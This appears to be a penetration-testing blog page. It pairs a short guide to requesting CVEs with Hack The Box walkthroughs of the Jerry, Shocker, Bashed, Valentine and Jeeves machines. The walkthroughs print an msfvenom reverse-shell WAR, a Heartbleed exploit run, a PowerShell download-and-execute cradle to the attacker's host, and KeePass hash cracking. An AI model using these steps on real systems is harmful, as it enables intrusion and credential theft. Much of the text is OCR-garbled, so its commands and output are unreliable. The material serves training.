Featured

A Simple Guide to Getting CVE’s

Written by @hyd3sec and boku

So you found a vulnerability and you want to get a CVE? SWEET!

Make sure that the vulnerability doesn’t already exist. That’d be lame if you went through all this work only to find it’s already out there… but still kudos to you for finding it! The only place you REALLY need to check is the MITRE database, but you should also check google, github, etc.

Contact the vendor/product owner and disclose the issue. Now if they have a bug bounty program that you’re involved with then unfortunately their disclosure policies may prevent you from disclosing it at all. Here’s the important part… take screenshots, save emails, do whatever to make sure that you document that you attempted to contact the application owner. This is where the clock starts ticking.

When contacting the vendor, aim for coordinated disclosure. In an ideal situation, you will release the vulnerability details after the vendor has been able to release a patch. With a responsive and cooperative vendor, MITRE has great documentation on how to progress your CVE to disclosure that can be found here: https://cve.mitre.org/CVEIDsAndHowToGetThem.pdf . However, for many reasons, the vendor will ghost you. If this is the case (and it typically is) this is what we do…

Disclosure is a gray area with no defined rules, but most people wait 30, 60, 90, or even up to 120 days after notifying/attempting to notify the vendor before disclosing. While you are waiting, go to the MITRE website and fill out the CVE request form. This process is going to be done on a case-by-case basis (ex. if the company/owner is a CVE Numbering Authority, also known as a CNA).

If you don’t see them in the CNA list, fill out this form: https://cveform.mitre.org/. This has taken us roughly 30 days on average, so we like to submit this once we find the vulnerability. Once you get a CVE ID (they will notify you by email), you’ll notice that it’s in a RESERVED state. This means that your CVE has been accepted by MITRE but has not been published yet.

Now while you’re waiting, it’s generally a good idea to keep trying to contact the application owner/developer at least every 30 days. Once you have waited however long you decide to/whatever the application owner and you agree upon, it’s time to publish! This is the best way that we have found to accomplish this:

Send POC/exploit to PacketStorm Security/CX Security. A good format for the header is what Exploit-DB shows here: https://www.exploit-db.com/submit. Make sure that you include the RESERVED CVE-ID that you got from MITRE when you submit to these two websites.
Once the exploits are published, send the links to MITRE by replying to the email that they sent you with a link to the published POC/Exploit.
MITRE typically has a quick turn-around for this (1 day or so). Sometimes they email you with an update, sometimes they don’t. Best thing to do is to check the original CVE Link they sent and see if it changed from RESERVED and shows the details of the CVE.
CONGRATS! YOU’VE GOT A PUBLISHED CVE!!!
If you so choose, you can now try to send your exploit/POC to exploit-db. They typically won’t respond with an update on whether they decide to publish or not, but if not, try and try again!

EDIT: My friend Valerio had an issue where MITRE wasn’t being responsive. He had this addition:

If Mitre doesn’t respond to your email after months, it’s enough to open a new request not as a “CVE Request” but as “other”, specifying you are waiting for such a long time… after doing this, they replied to him after 24 hours with CVE IDs. Thanks Valerio!

Happy Hunting!

Resources: https://cve.mitre.org/CVEIDsAndHowToGetThem.pdf

Jerry – No Metasploit

Yeah… that’s definitely not the Jerry I remember from Tom and Jerry. Anyway, let’s get started with our usual portscan:

PORT
STATE
8Ø8Ø/tcp open
l_http-favicon:
I http-methods:
SERVICE
http
Apache
REASON
VERSION
I _ Supported Methods:
syn-ack tt1 127 Apache Tomcat/Coyote JSP engine 1.1
Tomcat
GET HEAD POST OPTIONS
l_http-server-header: Apache-coyote/ 1.1
l_http-title: Apache Tomcat/7.ø.88
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2012 (90%)
OS CPE: cpe: /o:microsoft
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
Aggressive OS guesses: Microsoft Windows Server 2012 (90%), Microsoft Windows Server 2012 or Windows Server 2012 R2 (90%),
No exact OS matches for host (test conditions non-ideal).
TCP/IP fingerprint:
OPS(OI

Okay. Let’s look at some other enumeration scans, namely gobuster on port 8080 and nikto:

kaliöhyd3 . "Tools/AutoRecon/resuIts/1ø.1ø.1ø.95/scans$ cat tcp_8Ø8Ø_http_gobuster.txt
(aux (Status:
(coml (Status:
/com4 (Status:
/com2 (Status:
/com3 (Status:
Icon (Status:
(docs (Status:
200) [Size: 0]
200) [Size: 0]
200) [Size: 0]
200) [Size: 0]
200) [Size: 0]
200) [Size: 0]
302) [Size: 0]
(examples (Status: 302) [Size: 0]
/favicon .ico (Status: 200) [Size: 21630]
(host-manager (Status: 302) [Size: 0]
/ index.jsp (Status: 200) [Size: 11398]
(manager (Status: 302) [Size: 0]
/nul (Status: 200) [Size: 0]

kalijhyd3 . —/TooIs/AutoRecon/resuIts/1ø.1ø.1ø.95/scans$ cat tcp_8Ø8Ø_http_nikto.txt
- Nikto v2.1.6
Target IP:
Target Hostname:
Target Port:
Start Time:
10.10.10.95
10. 10.10.95
8080
2020-05-28 14:11:59 (GMT-4)
Server: Apache-coyote/ 1.1
The anti-clickjacking X-Frame-Options header is not present.
The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
The X-Content-Type-Options header is not set. This could allow the user agent to render
the content of the site in a different fashion to the MIME type
No CGI Directories found (use '-C all' to force check all possible dirs)
OSVDB-39272: /favicon.ico file identifies this app/server as: Apache Tomcat (possibly 5.5.26 through 8.0.15), Alfresco Community
Allowed HTTP Methods: GET, HEAD, POST, PUT, DELETE, OPTIONS
OSVDB-397: HTTP method ( 'Allow' Header): 'PUT' method could allow clients to save files
on the web server.
OSVDB-5646: HTTP method ( 'Allow' Header): 'DELETE' may allow clients to remove files on
the web server.

Hmm. Ok interesting… So we can use PUT and place a malicious file on the server…? But let’s see if there’s another way to get into this box:

Ooh Apache Tomcat! Pretty familiar with this. Using default creds: tomcat and s3cret, we get in.

Scrolling down, we see we can upload a .war file.

Deploy
Deploy directory or WAR file located on server
Context Path (required):
XML Configuration file URL:
WAR or Directory URL:
Deploy
WAR file to deploy
Select WAR file to upload
Browse...
Deploy
No file selected.

Too easy. We can generate a war file with msfvenom to get a reverse shell:

kalijhyd3. •-/Documents/htb/jerry$ msfvenom -p java/jsp_shell_reverse_tcp LHOST=1ø.1ø.14.3ø LPORT=4444 -f war > hyd3 .war
Payload size: 1089 bytes
'Final size of war file: 1089 bytes

Clicking the link navigates us to our war file which triggers the reverse shell

kaliö)hyd3 . "Documents/htb/jerry$ rlwrap nc -nvlp
listening on [any]
connect to [10.10.14.30] from (UNKNOWN) [10.10.10.95] 49192
Microsoft Windows [Version 6.3.96øø]
(c) 2013 Microsoft Corporation. All rights reserved .
whoami
nt authority\system
hostname
JERRY

NT AUTHORITY\SYSTEM shell! A bit anti-climactic but oh well. Getting the flags, we see that this was the intended way because we have “2 for the price of 1.txt” for the flags:

Shocker – No Metasploit

Cool… let’s get started with a portscan and basic gobuster enumeration:

Okay. Let’s have a look at the website:

Hm. Seemingly useless dead end.

I thought I was missing something. No matter how much I try to enumerate, I come up short with nothing:

Then after doing A LOT of research, I found out that cgi-bin stores scripts in other languages such as python, js, bash, php, etc.

Let me try fuzzing that with those specific extensions:

Finally a hit. user.sh

Googling for cgi-bin and sh web exploits, shellshock came up… I looked into it more and knew I had to put a special shellshock string into the User-Agent field to exploit the vulnerability, followed by the command

And we get a callback on our listener:

Note: Usually I’ll have tested the above exploit with a ping first, but at this point I was extremely frustrated and just wanted to go for it.

Grabbing the user flag:

Okay. Now on to priv esc. I always like to do sudo -l as one of the first enumeration commands:

duh. So I can run any perl command as root. This should be pretty obvious but from here, all you need to do is sudo /usr/bin/perl and then either use pentestmonkey’s perl reverse shell one-liner and you’ll get a root shell OR just use perl syntax to switch to the root user. Leaving this open-ended for you to figure out the rest!

Bashed – No Metasploit

Let’s start off with our portscan:

Looks like only port 80 is open. Running gobuster on port 80, we get some interesting directories:

After going down the list, we see /dev’s contents:

What’s phpbash.php ?

It’s an interactive web shell. Well that’s pretty straight forward. Using this payload from the pentestmonkey website:

We get a reverse shell on our listener:

Grabbing the user.txt flag:

So let’s look around and MANUALLY enumerate before we try to use scripts. Manual enumeration is always preferred because you’re being more intentional on what you’re looking at. And to be honest, scripts can always miss stuff.

Running PS -ef we see that there is a cron job running every minute:

So let’s try to read test.py

Womp womp. Okay… well let’s try to do something that we should have done right away in the first place: sudo -l

So this is interesting. We know that scriptmanager is a user on the box. This took me a little bit, but I eventually got it (of course, syntax error):

So now, I can read test.py. Now that I am scriptmanager, I’m willing to bet that test.py is executed by root. I just need to create my own test.py and replace what’s in there.

Once I put this on the box, I tested it first to make sure it worked … of course I had a few issues prior to getting the script right but that’s why we test first!

Ok so the script works. Time to let the cron run and start our listener and wait patiently for root to execute the script:

Valentine – No Metasploit

Alright, let’s get into it. Fire off autorecon and return the portscan results:

22/tcp open ssh
I ssh-hostkey:
syn-ack tt1 63 OpenSSH 5.9p1 Debian 5ubuntu1.1Ø (Ubuntu Linux; protocol 2.0)
1024 (DSA)
ssh-dss AAAAB3NzaC1kc3MAAACBAIMeSqrDdAOhxf7PIIDtdRqunøp09pmUi+474hX6LHkDgC9dzcvEGyMB/cuuCCjfXn6QD
vy72rbFkSTm1MuUFQDvNVA5vTpfj5pUCUN Fyvnhy3TdcQAAAIBFqVHk74m1T3PWKSpWcZv11KCGg5rGCCE5B3 j RWEbR08CPRkw
s ba /BP8Uf c u PM+WGWKxj u a OJ t 6 j eD8iQAAAIBg9 rgf8N ORfGq z i +3 n d UC09 /m+T18pn +0RbCKdFGq 8Ec s 4QLeaXPMRI pCoI 11n 6
2048 (RSA)
ssh-rsa
gUem2TVIWqStLJ oPxt8i DPPM7929 EoovpooSj wPfq vEhRMtq +KKI q U6PrJD6Hs hGd j Lj ABYYII j fKa kgBfWi C+YOKWKa 9 q d eBFø
256 (ECDSA)
I _ecdsa-sha2-nistp256
8Ø/tcp open http
syn-ack tt1 63 Apache httpd 2.2.22 ((Ubuntu))
I http-methods:
1_ supported Methods: GET HEAD POST OPTIONS
l_http-server-header: Apache/ 2.2.22 (Ubuntu)
l_http-title: Site doesn't have a title (text/html).
443/tcp open ssl/http syn-ack ttI 63 Apache httpd 2.2.22 ( (Ubuntu))
http-methods :
supported Methods: GET HEAD POST OPTIONS
l_http-server-header: Apache/ 2.2.22 (Ubuntu)
l_http-title: Site doesn't have a title (text/html).
ssl-cert: Subject:
Issuer:
Public Key type: rsa
Public Key bits: 2048
Signature Algorithm: shalWithRSAEncryption
Not valid before: 2018-02-06Tøø: 45: 25
Not valid after:
2019-02-06Tøø: 45 : 25
at*13 c-«ø b145 2154 fb51+ b2de c7a9 8Ø9d
MD5 :
SHA-I: 2303 80da 60e7 bde7 2ba6 76dd 5214 3c3c 6f53 Ø1b1

So autorecon has a neat feature where it will further enumerate ports and put them in separate text files. Opening tcp_443_http_nmap.txt shows:

ssl-heartbleed:
VULNERABLE :
The Heartbleed Bug is a serious vulnerability in the popular OpenSSL cryptographic software library. It allows for s
State: VULNERABLE
Risk factor: High
OpenSSL versions l.ø.l and 1.Ø.2-beta releases (including l.ø.lf and 1.Ø.2-beta1) of OpenSSL are affected by the
by the vulnerable OpenSSL versions and could allow for disclosure of otherwise encrypted confidential information as

The gobuster output on port 443 shows:

(decode (Status: 200) [Size: 552]
(decode. php (Status: 200) [Size: 552]
(dev (Status: 301) [Size: 310]
(encode (Status: 200) [Size: 554]
/encode.php (Status: 200) [Size:
554]
/ index (Status: 200) [Size: 38]
/ index.php (Status: 200) [Size:
38]
/ index.php (Status: 200) [Size: 38]

Port 80 shows the same:

(decode (Status: 200) [Size: 552]
/decode.php (Status: 200) [Size: 552]
(dev (Status: 301) [Size: 308]
(encode (Status: 200) [Size: 554]
(encode. php (Status: 200) [Size:
554]
/ index (Status: 200) [Size: 38]
/ index.php (Status: 200) [Size:
38]
/ index.php (Status: 200) [Size: 38]

Looking at the actual website and poking around we don’t see much:

/decode and /encode.php don’t show much either. However, going to /dev/ we see something interesting:

And hype_key:

So this is pretty obviously hex code. Copy that file onto your box and run xxd on it to read what it says:

. "Documents/htb/valentine$ cat hype_key I
xxd
--BEGIN RSA PRIVATE KEY-----
Proc-Type: 4, ENCRYPTED
DEK-1nfo: AES-128-CBC,AEB88CIWF69BF2ø74788DE24AE48D46
DbPr078kegNuk1DAq1AN5jbjxvøPPsog3jdbMFS8iE9p3UOLø1Føxf7PzmrkDa8R
5y/b46+9nEpCMfTPhNuJRcW2U2gJcOFH+9RJDBC5UJMUS1/gjB/7/MyOO%x+a16
DEIOSb0YUAVIW4EV7m96QszjrwJvnjvafm6VsKaTPBHpugcASvMqz76W6abRZeXi
Ebw66h j FmAu4AzqcM/kigNRFPYuNiXrXs1w/deLCqCJ+Ea1T8z1as6fcmhM8A+8P
OXBKNe6117hKaT6wFnp5eXOaUIHvHnv06ScHVWRrZ7øfcpcpimL1w13Tgdd2AiGd
pHLJpYU115Pu06x+LS8n1r/GWMqSOEimNRD1j/59/4u3ROrTCKe09DsTRqs2k1SH
Qd1W'FwaXbYyT1uxAMS15Hq90D5HJ8GøR6J15RvCNUQjwxøFITj jMjnL1pxjvfq+E
Km6rCZqacwnSddHW8W3Lx JmCxdxW51 t5dPjAkBYRUn191 ESCi D4Z+uC
t 9 grSos RTCs Zdl 40Pts pKxMMOs gn ox vnI POSwSpWy 9Wp6y8XX8+F 4ørx15
XqhDUBhyk1C3YPOiDuPOnMXa1pe1dgbONdDIM9ZQSNULw1DHCGPP4JSSxX7BWdDK
aAnWJvFg1A40FBBVA8uAPMfV2XFQnjwUT5bPLC65tFstoRtTZ1uSruai27kxTnLQ
+wQ871Madds1GQNeGsKSf8R/rsRKeeKci1 De PC j eaLq tqxnhNoFtgøMxt6r2gb1E
AIOQ6j g5Tbj 5 J 7 Np9GVpi nPc3KpHttvgbpt fiWEEsZYn5yZPhUr9Q
rø8pkOxArXE2dj7eX+bq656350J6TqHbAITQIRs9Pu1rS7K4SLX7nY89/RZ50SQe
2VURyTZ1 FfngJSsv9+Mfvz3411 bzOIWmk7WfEcWcHc16n 9VOIbSNALn jThvEcPky
el Bs fSbs f9 F gu UZkgHAnn fRKkGVGIOVy uwc / LV jmbhZzKwLhaZRNd8HEM86fNoj P
09nVjTaYtWUXkOSi1W02wbu1NzL+1Tg91pNy1SFCFYjSqiyG+WU71wK3YU5kp3CC
dYScz63Q2pQa fx fSbu v4CMnNpdi rVKE05nRRfK/i aL3X1 R3DxV8eSYFKFL6pqpuX
cY5YZJGAP+JxsnIQ9CFyxIt92frXznsjh1Ya8svbVNNfk/9fyX60p24rL2DyESpY
pnsukBCFBkZHWNNyeN7b5GhTVCodHhzHVFehTuBrP+VuPqaqDvMCVe1DZCb4MjAj
Ms I f+9xK+TXEL3i cmIOBRdPyw6e/ JIQIVRImShFp18eb/8VsTyJSe+b853zuV2qL
suLaBMxYKm3+zEDIDveKPNaaWZgEcqxy1CC/wUyUXIMJ5øNw6JNVW8LeCii30EW
101n9L1b/NXpHjGa8WHHTj01i1B5qNUyywSeTBF2awRIXH9BrkZG4Fc4gdmW/1zT
RUgZkbMQZN11fzj1Qui1RVBm/F76Y/YMrmnM9k/1xSG1skwCUQ+95CGHJE8MkhD3
-kal iö)hvd3 . "Documents/htb/valentine$
--END RSA PRIVATE KEY----

Looks like it’s an ssh key for… hype?

Well, let’s try to login with it.

kaliöhyd3 . —"Documents/htb/valentine$ chmod 600 hype_key_decoded
kaliöhyd3 . —"Documents/htb/valentine$ ssh -i hype_key_decoded hypeö1ø.1ø.1ø.79
Enter passphrase for key 'hype_key_decoded'

Ok… so we need a passphrase

Heartbleed has been known to leak information… let’s see if we can find something on git to help extract this info

This python script allows us to exploit the heartbleed bug: https://raw.githubusercontent.com/roflcer/heartbleed-vuln/master/attack.py

After supplying the required params, we get something back that looks like base64:

kaliöhyd3 . —"Documents/htb/valentine$ chmod 755 attack.py
kaliöhyd3: —"Documents/htb/valentine$ python2 attack.py 10.1Ø.1Ø.79 -I ØX4ØØ1
defribulator VI.2ø
A tool to test and exploit the TLS heartbeat vulnerability aka heartbleed (CVE-2ø14-ø16ø)
Connecting to: 10.10.10.79:443, 1 times
Sending Client Hello for TLSv1.ø
Analyze the result....
Analyze the result....
Analyze the result....
Analyze the result....
Received Server Hello for TLSv1.ø
'Analyze the result....
WARNING: 10.10.10.79:443 returned more data than it should -
Please wait... connection attempt 1 of 1
. a. muuuuuuuuuuABCDEFGHIJKLMNOABC...
....3.2....... / A
....ø.ø.l/decode.php
Content-Type: application/x-www-form-urlencoded
I Content-Length: 42
server is vulnerable!

Decode that string and you get a potential password

Let’s try to ssh in again…

kalijhyd3 . "Documents/htb/valentine$ ssh -i hype_key_decoded hypeö1ø.1ø.1ø.79
Enter passphrase for key '
Welcome to Ubuntu 12.04 L TS (GNU/Linux 3.2.ø-23-generic x86_64)
* Documentation:
https://help.ubuntu.com/
New release '14.04.5 LTS' available.
-upgrade' to upgrade to it.
Run ' do-release
, Last login: Fri
Feb 16 2018 from 10.10.14.3
whoami
hype
hostname
Valentine

Alright, now time to Priv Esc. After looking around (A LOT), I realized it’s always good to look at .bash_history, so I did:

hypeöVa1entine:/$ cat
exit
exot
exit
bash _ history
cd
. devs
tmux
tmux
tmux
tmux
exit
-L dev sess
a -t dev sess
--help
-S / .devs/dev_sess

hypeöVaIentine:/$ cd .devs
hypeöVa1entine:/.devs$ Is -la
total 8
drwxr-xr-x 2
drwxr-xr-x 26
srw-rw--
1
root
root
root
hype 4096
root 4096
hype
May
Feb
May
28
6
28
08: 48
2018
08:48 dev sess

Running down the list of commands and running: tmux -S /.devs/dev_sess looks like it spawns a tmux session as root

Jeeves – No Metasploit

Fire up autorecon and run some scans… I did this while I went to http://10.10.10.63. It’s a good habit to just try port 80 while your scans are running so you’re not wasting time.

So when we go to the website and try searching, anything we do results in this:

Server Error in '/' Application.
Conversion failed when converting the nvarchar value 'Microsoft SQL Server 2005
May 26 2009 14:24:20
Copyright (c) 1988-2005 Microsoft Corporation
standard Edition on Windows NT 5.0 (Build 2195: service Pack 4)
' to data type int.
- 9.00.4053.00 (Intel X86)
Description: An ocwrred during the of the web rewest. review the suck trace for information the error and o@inated wd e.
Exception Details: System DataSqICIient-SØException: Cmversion füd when the nvarchar value 'Microsoft SQL Server 2Ø5 - 9.00-4053.00 X86)
May 26 2009
Copyr•t (c) 19"-2005 Microwtt Corporation
Edition on Windows NT 5.0 (Build 2195: Service 4)
• to data type int.
Error:

But weird thing is… it’s a fake image. So this is a dead end.

I waited a bit and got my scans back. Let’s look at nmap:

Nmap scan report for 10.10.10.63
Host is up, received user-set (ø.ø44s latency).
scanned at 2020-05-27 16:17:20 EDT for 192s
Not shown: 65531 filtered ports
Reason: 65531 no-responses
PORT
8Ø/tcp
STATE SERVICE
open http
REASON
VERSION
syn-ack tt1 127 Microsoft IIS httpd 10.0
I http-methods:
I supported Methods: OPTIONS TRACE GET HEAD POST
Potentially risky methods: TRACE
l_http-server-header: Microsoft-IIS/1ø.ø
I _http-title: Ask Jeeves
135/tcp
open msrpc
syn-ack tt1 127 Microsoft Windows RPC
10 microsoft-ds (workgroup: WORKGROUP)
445/tcp
open microsoft-ds syn-ack ttI 127 Microsoft Windows 7 -
5ØØØØ/tcp open http
syn-ack ttl 127 Jetty 9.4.z-SNAPSHOT
l_http-server-header: Jetty(9.4.z-SNAPSHOT)
I _http-title: Error Not Found
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2008 (88%)
OS CPE: cpe: /o:microsoft : r2
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
Aggressive OS guesses: Microsoft Windows Server 2008 R2 (88%)
No exact OS matches for host (test conditions non-ideal).
TCP/IP fingerprint:
OPS(OI

Okay so there’s a port 50000 as well. I like to switch up the enumeration tools so this time I wanted to try using wfuzz. Running wfuzz on port 80 didn’t show anything new. However, on port 50000:

kalijhyd3 . —/TooIs/AutoRecon/resuIts/1Ø.1Ø.1Ø.63/scans$ wfuzz -c -w /usr/share/wordlists/dirbus
ter/directory-1ist-2.3-medium.txt -
-hc http://1Ø.1Ø.1Ø.63:5ØØØØ/FUZZ
Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing S
SL sites. Check Wfuzz's documentation for more information.
* Wfuzz 2.4.5 -
The Web Fuzzer
Target: http://1Ø.1Ø.1Ø.63:5ØØØØ/FUZZ
Total requests: 220560
ID
øøøø41607 :
000048313 :
Finishing
Response
302
pending
Lines
11 L
Word
26 w
Chars
Ch
318 Ch
Payload
" askj eeves "
"bt3"
requests...

Alright… Let’s navigate to http://10.10.10.63:50000/askjeeves/

Jenkins
Jenkins
New Item
People
Build History
Manage Jenkins
Credentials
Build Queue
No builds in the queue.
Build Executor Status
1 Idle
2 Idle
log in
AUTO REFRESH
gadd description
All
s
0
Icon:
w
Name
da nci n2020
Last Success
7 hr56 min - #10
7 hr28 min - #1
Last Failure
7 hr25 min - #16
WA
RSS for all
Last Duration
2.3 sec
2.6 sec
RSS for failures RSS for iust latest builds

Interesting. I tried logging in with default creds and common lists, but nothing worked. I then just started poking around at the site to see what I could do without logging in.

Looks like we can create a project.

e Jenkins
Jenkins
Enter an item name
pngmel
Required field
Freestyle project
This is the central feature of Jenkins. Jenkins will build your project, combining any SCM with any build system, and this can be even used for
something other than software build.
Pipeline
Orchestrates long-running activities that can span multiple build slaves. Suitable for building pipelines (formerly known as workflows) and/or
organizing complex activities that do not easily fit in free-style job type.
Multi-configuration project
Suitable for projects that need a large number of different configurations, such as testing on multiple environments, platform-specific builds, etc.
Folder
Creates a container that stores nested items in it Useful for grouping things together. Unlike view, which is just a filter, a folder creates a separate
namespace, so you can have multiple things of the same name as long as they are in different folders.
GitHub Organization
Scans a GitHub organization (or user account) for all repositories matching some defined markers.
Multibranch Pipeline
Creates a set of Pipeline projects according to detected branches in one SCM repository.
create a new item from other existing, you can use this option:
Type to autocomplete
log in

Now clicking around and scrolling down… we see something very interesting:

Jenkins
pi ngme
General
Source Code Management
Build Triggers
Build Environment
Build
Post-build Actions
Build periodically
GitHub hook trigger for GITScm polling
Poll SCM
Build Environment
Delete workspace before build starts
Abort the build if it's stuck
Add timestamps to the Console Output
Use secret text(s) or file(s)
With Ant
Build
Add build step
Execute Windows batch command
Execute shell
Invoke Ant
Invoke Gradle script
Invoke top-level Maven targets
Run with timeout
Set build status to -pending" on GitHub commit
Page generated: May 28, 2020 224-53 PM EDT
REST API
Jenkins ver. 2.87

This looks like a clear path to RCE. Let’s test it out:

Build
Execute Windows batch command
Command
ping 1€.1€.14.3€
See the list of available environment variables
Add build step
Post-build Actions
Add post-build action
Apply
Advancedm

After saving it, I had to figure out how to trigger it. The “build now” button seemed like a good candidate:

Build Now
Delete Project
Configure
Build History
find
May 28, 2020 226 PM
trend —

Running tcpdump on my box, I see the ICMP requests coming through:

kaliö)hyd3 . "Tools/AutoRecon/resuIts/1Ø.1Ø.1Ø.63/scans$ sudo tcpdump -i tunø
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on tunø, link-type RAW (Raw IP), capture size 262144 bytes
IP hyd3.5Ø661+ > 10.10.1ø.63.5øøøø: Flags seq 984844400:984845062, ack 30
63434529, win 501, options [nop, nop,TS val 1480055907 ecr 40178073], length 662
•24.973560 IP 10.10.10.63.5øøøø > hyd3.5Ø664: Flags seq 1:206, ack 662, win 254, op
09:22.
tions
[nop, nop,TS val 40181743 ecr 1480055907], length 205
•24.973596 IP hyd3.5Ø661+ > 10.10.1ø.63.5øøøø: Flags [ . ] , ack 206, win 501, options [nop,n
09:22.
val 1480055951 ecr 40181743], length
op , TS
•25 . 043798 IP 10.10.1Ø.63 > hyd3: ICMP echo request, id 1, seq 5, length
09:22.
•25.043814 IP hyd3 > 10.1Ø.1Ø.63: ICMP echo reply, id 1, seq 5, length
09:22.
•26.061409 IP 10.10.10.63 > hyd3: ICMP echo request, id 1, seq 6, length
09:22.
•26. 061442 IP hyd3 > 10.10.10.63: ICMP echo reply, id 1, seq 6, length
09:22.
•26.312795 IP hyd3.5Ø661+ > 10.10.10.63.5øøøø: Flags [P.], seq 662:1331, ack 206, win 501,
09:22.
options [nop, nop,TS val 1480057290 ecr 40181743], length 669
IP 10.10.1ø.63.5øøøø > hyd3.5Ø664: Flags [P.], seq 206:1161, ack 1331, win 252
, options [nop, nop,TS val 40183134 ecr 1480057290], length 955
IP hyd3.5Ø661+ > 10.10.1Ø.63.5ØØØØ: Flags
nop,TS val 1480057342 ecr 40183134], length
IP 10.10.10.63 > hyd3:
IP hyd3 > 10.10.10.63:
IP 10.10.10.63 > hyd3:
IP hyd3 > 10.10.10.63:
ICMP
ICMP
ICMP
ICMP
echo
echo
echo
echo
request, id
reply, id 1,
request, id
reply, id 1,
ack 1161, win 501, options [nop,
1, seq 7, length
seq 7, length
1, seq 8, length
seq 8, length

Now it’s as simple as creating a reverse powershell script with Nishang and appending the bottom with a callback to our box:

catch
Write-warning
"Something went wrong! Check if the server is reachable and you are usin
g the correct port."
Write-Error $_
128, 63
Invoke-PowerSheIITcp -Reverse
-IPAddress 10.10.14.30
-Port
Bot

Serve up the PowerShell script:

kaliöhyd3 . "Documents/htb/jeeves$ python -m
Serving HTTP on ø.ø.ø.ø port 8000 (http://ø.
- [28/May/2Ø2Ø 09 : 36: 12] "GET
10.10.10.63 -
http.server
ø.ø.ø:8øøø/) .
/ Invoke-PowerShe11Tcp.ps1 HTTP/I.I"
200 -

Modify the build request:

Build
Execute Windows batch command
Command
IEX(New-Object Net .WebClient) .downloadString( 'http://l€ . 16 . 14.36 : 8€0€/Invoke-
PowerShellTcp . PSI
See the list of available environment variables
Add build s tep

Once you trigger it, you should receive a callback on your listener:

kaliö)hyd3 . —/Documents/htb/jeeves$ rlwrap nc -nvlp
listening on [any]
connect to [10.10.14.30] from (UNKNOWN) [10.10.10.63] 49688
Windows PowerSheII running as user kohsuke on JEEVES
Copyright (C) 2015 Microsoft Corporation. All rights reserved .
PS C:
j eeves\kohsuke
PS C: hostname
Jeeves

As a force of habit, I uploaded nc.exe and used it to get a binary shell as well

Some simple enumeration showed an interesting file: CEH.kdbx

Directory
05/28/2020
05/28/2020
09/18/2017
of C:
02:42 PM
02:42 PM
01:43 PM
2,846 CEH.kdbx

I tried copying the file with nc.exe but it was way too slow (if at all). I ended up using SMB:

kaliö)hyd3: "Documents/htb/jeeves/smb$ sudo python3 /usr/share/doc/python3-impacket/exampIes/sm
bserver. py hyd3 /home/kaIi/Documents/htb/jeeves/smb
Impacket vø.9.21 - Copyright 2020 SecureAuth Corporation
Config file parsed
Callback added for UUID 4B324FC8-167ø-01D3-1278-5A47BF6EE188 V:3.Ø
Callback added for UUID 6BFFDø98-A112-361ø-9833-46C3F87E345A v:l.ø
Config file parsed
Config file parsed
Config file parsed

Create the folder on the victim box and navigate to it:

Ips C.
• New-PSDrive -Name
0.14.
Name
hyd3
"hyd3"
-PSProvider
"FileSystem"
-Root
3Ø\hyd3"
Used (GB)
CurrentLocation
Free (GB) Provider
FileSystem
Root

Copy the file over

Now looking at the file and running file on it, you know it’s a keypass file. Crack it with hashcat. In order to do this first you need to extract the hash with keepass2john:

kaliöhyd3 . —/Documents/htb/jeeves/smb$ /usr/sbin/keepass2john CEH.kdbx > ceh .hash
kaliöhyd3 . —"Documents/htb/ jeeves/smb$ cat ceh . hash
CEH :
3766b61e656351C3acaØ282f1617511Ø31fØ156Ø89b6C5647de4671972fcff*Cb4Ø9dbCØfr66ØfCffr4f1CC89f728b
68254db431a21ec33298b612fe647db48
kaliö)hyd3 . •-/Documents/htb/jeeves/smb$ vi ceh .hash

Locate the mode (-m) for hashcat for this hash format:

Hashcat is not expecting the CEH: file name before the hash, so edit that and then run hashcat with rockyou.txt

kaliöhyd3 . —/Documents/htb/jeeves/smb$ vi ceh .hash
kaliöhyd3 . •-/Documents/htb/jeeves/smb$ cat ceh .hash
b61e656351C3acaØ282f1617511Ø31fØ156Ø89b6C5647de4671972fCff*Cb4Ø9dbCØfr66ØfCffr4f1CC89f728b6825
4db431a21ec33298b612fe647db48

kaliöhyd3 . "Documents/htb/jeeves/smb$ hashcat
txt ceh .hash
hashcat (v5.1.ø) starting...
OpenCL Platform #1: The pocu project
-m 13400
-w 1 /usr/share/wordlists/rockyou .
* Device #1: pthread-AMD Ryzen 7 2700 Eight-Core Processor, 1024/2272 MB allocatable,
Counted lines in /usr/share/wordlists/rockyou . txt... Insufficient memory available
Insufficient memory available
Segmentation fault
4MCU

Whoops… This happened because I swapped the wordlist and the actual hash… so hashcat thought it was cracking a much larger file.

kalijhyd3 : "Documents/htb/jeeves/smb$ hashcat
you . txt
hashcat (v5.1.ø) starting...
OpenCL Platform #1: The pocu project
-m 13400
-a ceh .hash /usr/share/wordlists/rock
* Device #1: pthread-AMD Ryzen 7 2700 Eight-Core Processor, 1024/2272 MB allocatable,
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, øxøøøøffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Applicable optimizers:
* Zero-Byte
* Single-Hash
* Single-Salt
Minimum password length supported by kernel:
Maximum password length supported by kernel: 256
Watchdog: Hardware monitoring interface not found on your system.
Watchdog: Temperature abort trigger disabled .
* Device #1: build_opts
' -cm-std=CL1.2 -I OpenCL -I
-D VENDOR ID-64 -D CUDA ARCH=ø -D AMD ROCM=ø -D
-D DGST RI-I -D DGST R2=2 -D DGST R3=3 -D DGST ELEM=I+ -D KERN TYPE=134øø -D unroll '
* Device #1: Kernel m134øø-pure.ce8862df .kernel not
4MCU
/usr/share/hashcat/OpenCL -D LOCAL_MEM_TYP
VECT SIZE-8 -D DEVICE TYPE-2 -D DGST RO=ø
found in cache! Building may take a while.

b61e656351C3acaØ282f1617511Ø31fØ156Ø89b6C5647de4671972fCff*Cb4Ø9dbCØft66ØfCfft4f1CC89f728b6825
4db431a21ec33298b612fe647db48 : moonshinel
Sesslon.....
hashcat
Status....
Cracked
Hash . Type. KeePass 1 (AES/Twofish) and KeePass 2 (AES)
Hash . Target....
Time Started
Thu May 28 2020 (31 secs)
Time. Estimated... :
Thu May 28 2020 (0 secs)
File (/usr/share/wordlists/rockyou . txt)
Guess .Base.......:
